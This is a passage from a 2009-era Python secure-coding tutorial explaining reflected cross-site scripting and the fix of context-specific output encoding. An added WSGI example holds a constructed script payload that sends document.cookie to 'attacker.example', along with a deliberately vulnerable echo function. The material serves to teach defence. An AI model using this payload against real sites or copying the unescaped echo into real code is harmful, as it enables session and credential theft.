Programming Secure Web Applications in Python

By Al Lukaszewski, About.com

5 of 10

Cross Site Scripting (XSS)

A cross-site scripting exploit (the reflected variant is described here; stored and DOM-based variants follow the same principle but deliver the payload differently) works like this:

  1. An attacker identifies a web application that echoes user-provided data from its URLs back into the page it returns (e.g., a search string repeated in the results heading).
  2. The attacker then forms a URL whose parameter value includes HTML (not necessarily with a header) and some in-line script, typically JavaScript. What matters is that the browser will treat it as script; a server-side language such as PHP is not what executes in the victim's browser.
  3. The attacker then, by hook or by crook, gets a victim to click on the link. This can be on a web page or in an email -- anything that is HTML-based.
  4. When the victim clicks the link, the victim's browser sends a GET request carrying the crafted HTML-and-script payload to the vulnerable application.
  5. When the web application echoes the user data into its response without encoding it, the victim's browser renders that response as part of the site's own page and executes the script contained therein, with the site's origin and the victim's session. The script can then do just about anything the victim can - read cookies, modify links on the page, capture passwords typed into forms, etc.

All of this is possible because the web application receives user data, does not check it, and echoes it back into its HTML output without encoding it. Naturally, this feeds back into the first issue, unvalidated input. Input validation alone is not enough, though, because which characters are dangerous depends on where the value ends up: a string that is harmless in a database query can be live markup once it is written into a page. The reliable fix is output encoding. Replace the HTML metacharacters (<, >, &, " and ') with their entity equivalents at the point where the value is written into the page, and encode for the specific context (element body, attribute value, URL, or script block) rather than for "HTML" in general; in the standard library, html.escape() covers the element-body and attribute cases. If an input field must be able to accept markup, still escape every metacharacter on output and only re-enable the handful of constructs the application genuinely needs.
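The following is an added example, not code from the original article: a minimal WSGI search page that echoes the q parameter, first in the vulnerable form the five steps above describe and then with context-specific escaping. The /search endpoint, the attacker payload and the "attacker.example" host are assumptions constructed for illustration; the check at the end only looks for a surviving script tag, which is enough to show the difference between the two renderings.

```python
"""Reflected XSS in a minimal WSGI search page: the vulnerable echo next to the escaped one."""
import html
from urllib.parse import parse_qs, quote

# Constructed attacker payload (assumption for illustration): the kind of
# in-line script step 2 describes, here leaking document.cookie to attacker.example.
PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'


def attack_query_string():
    """The query string the attacker's link carries (steps 3 and 4): URL-encoded payload in q."""
    return "q=" + quote(PAYLOAD, safe="")


def get_query(environ):
    """Pull the search term out of the GET request's query string (percent-decoding it)."""
    params = parse_qs(environ.get("QUERY_STRING", ""))
    return params.get("q", [""])[0]


def vulnerable_page(q):
    """Step 5: the user's search term is echoed verbatim into the HTML body."""
    return f"<html><body><h1>Results for: {q}</h1></body></html>"


def safe_page(q):
    """The fix: encode the value for the context it lands in, at the point of output."""
    # Element body or quoted attribute: entity-encode < > & " '
    body_safe = html.escape(q, quote=True)
    # Inside an href: percent-encode for the URL first, then entity-encode for the attribute.
    url_safe = html.escape(quote(q, safe=""), quote=True)
    return (
        "<html><body>"
        f"<h1>Results for: {body_safe}</h1>"
        f'<a href="/search?q={url_safe}">search again</a>'
        "</body></html>"
    )


def make_app(render):
    """Wrap a page renderer as a WSGI callable (assumed /search endpoint)."""
    def app(environ, start_response):
        body = render(get_query(environ)).encode("utf-8")
        start_response("200 OK", [("Content-Type", "text/html; charset=utf-8"),
                                  ("Content-Length", str(len(body)))])
        return [body]
    return app


def call(app, query_string):
    """Drive a WSGI app offline with a GET request carrying the given query string."""
    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": "/search",
               "QUERY_STRING": query_string}
    captured = {}

    def start_response(status, headers):
        captured["status"] = status

    body = b"".join(app(environ, start_response)).decode("utf-8")
    return captured["status"], body


def has_live_script(page):
    """Crude detection check: an unescaped <script tag survived into the response."""
    return "<script" in page.lower()


if __name__ == "__main__":
    _, vuln = call(make_app(vulnerable_page), attack_query_string())
    _, safe = call(make_app(safe_page), attack_query_string())
    print("vulnerable page executes attacker script:", has_live_script(vuln))
    print("escaped page executes attacker script:   ", has_live_script(safe))
    print(safe)
```

Note that the same value is encoded twice in the href: once for the URL and then once more for the attribute it sits in. Applying only html.escape() there would still let the attacker inject extra query parameters, and applying only URL encoding to the heading would leave the markup intact, so the encoding has to follow the output context rather than be applied once on the way in.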


©2009 About.com, a part of The New York Times Company.

All rights reserved.